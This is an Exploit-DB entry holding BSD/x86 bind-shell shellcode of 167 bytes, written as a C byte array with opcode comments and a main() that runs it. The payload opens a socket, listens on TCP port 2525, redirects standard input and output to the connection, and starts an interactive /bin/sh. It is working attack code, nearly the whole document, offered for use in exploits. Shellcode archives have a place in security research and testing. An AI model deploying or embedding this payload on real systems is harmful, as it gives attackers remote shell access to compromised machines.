BSD/x86 - Bind (2525/TCP) Shell Shellcode (167 bytes)

EDB-ID:

14795

CVE:

N/A




Platform:

BSD_x86

Date:

2010-08-25


/*
==================================================
bds/x86-bindshell on port 2525 shellcode 167 bytes
==================================================
*/


/*
-------------- bds/x86-bindshell on port 2525 167 bytes -------------------------
*  AUTHOR : beosroot
*   OS    : BSDx86 (Tested on FreeBSD)
*   EMAIL : beosroot@hotmail.fr
             beosroot@null.net
*  GR33TZ To : joseph-h, str0ke, MHIDO55,.....
*/

const char shellcode[] =
    "\x6a\x00"                  // push   $0x0
    "\x6a\x01"                  // push   $0x1
    "\x6a\x02"                  // push   $0x2
    "\x50"                      // push   %eax
    "\x6a\x61"                  // push   $0x61
    "\x58"                      // pop    %eax
    "\xcd\x80"                  // int    $0x80
    "\x50"                      // push   %eax
    "\x6a\x00"                  // push   $0x0
    "\x6a\x00"                  // push   $0x0
    "\x6a\x00"                  // push   $0x0
    "\x6a\x00"                  // push   $0x0
    "\x68\x10\x02\x09\xdd"      // push   $0xdd090210
    "\x89\xe0"                  // mov    %esp,%eax
    "\x6a\x10"                  // push   $0x10
    "\x50"                      // push   %eax
    "\xff\x74\x24\x1c"          // pushl  0x1c %esp
    "\x50"                      // push   %eax
    "\x6a\x68"                  // push   $0x68
    "\x58"                      // pop    $eax
    "\xcd\x80"                  // int    $0x80
    "\x6a\x01"                  // push   $0x1
    "\xff\x74\x24\x28"          // pushl  0x28 %esp
    "\x50"                      // push   %eax
    "\x6a\x6a"                  // push   $0x6a
    "\x58"                      // pop    $eax
    "\xcd\x80"                  // int    $0x80
    "\x83\xec\x10"              // sub    $0x10,$esp
    "\x6a\x10"                  // push   $0x10
    "\x8d\x44\x24\x04"          // lea    0x4%esp,%eax
    "\x89\xe1"                  // mov    %esp,%ecx
    "\x51"                      // push   %ecx
    "\x50"                      // push   %eax
    "\xff\x74\x24\x4c"          // pushl  0x4c %esp
    "\x50"                      // push   %eax
    "\x6a\x1e"                  // push   %0x1e
    "\x58"                      // pop    %eax
    "\xcd\x80"                  // int    $0x80
    "\x50"                      // push   %eax
    "\xff\x74\x24\x58"          // pushl  0x58 %esp
    "\x50"                      // push   %eax
    "\x6a\x06"                  // push   $0x6
    "\x58"                      // pop    %eax
    "\xcd\x80"                  // int    $0x80
    "\x6a\x00"                  // push   $0x0
    "\xff\x74\x24\x0c"          // pushl  0xc %esp
    "\x50"                      // push   %eax
    "\x6a\x5a"                  // push   $0x5a
    "\x58"                      // pop    %eax
    "\xcd\x80"                  // int    $0x80
    "\x6a\x01"                  // push   $0x1
    "\xff\x74\x24\x18"          // pushl  0x18 %esp
    "\x50"                      // push   %eax
    "\x6a\x5a"                  // push   $0x5a
    "\x58"                      // pop    %eax
    "\xcd\x80"                  // int    $0x80
    "\x6a\x02"                  // push   $0x2
    "\xff\x74\x24\x24"          // pushl  0x24 %esp
    "\x50"                      // push   %eax
    "\x6a\x5a"                  // push   $0x5a
    "\x58"                      // pop    %eax
    "\xcd\x80"                  // int    $0x80
    "\x68\x73\x68\x00\x00"      // push   $0x6873
    "\x89\xe0"                  // mov    %esp,%eax
    "\x68\x2d\x69\x00\x00"      // push   $0x692d
    "\x89\xe1"                  // mov    %esp,%ecx
    "\x6a\x00"                  // push   $0x0
    "\x51"                      // push   %ecx
    "\x50"                      // push   %eax
    "\x68\x2f\x73\x68\x00"      // push   $0x68732f
    "\x68\x2f\x62\x69\x6e"      // push   $0x6e69622f
    "\x89\xe0"                  // mov    %esp,%eax
    "\x8d\x4c\x24\x08"          // lea    0x8 %esp,%ecx
    "\x6a\x00"                  // push   $0x0
    "\x51"                      // push   %ecx
    "\x50"                      // push   %eax
    "\x50"                      // push   %eax
    "\x6a\x3b"                  // push   $0x3b
    "\x58"                      // pop    %eax
    "\xcd\x80";                 // int    $0x80

int main() {

    void (*hell)() = (void *)shellcode;
    return (*(int(*)())shellcode)();

}



// the end o.O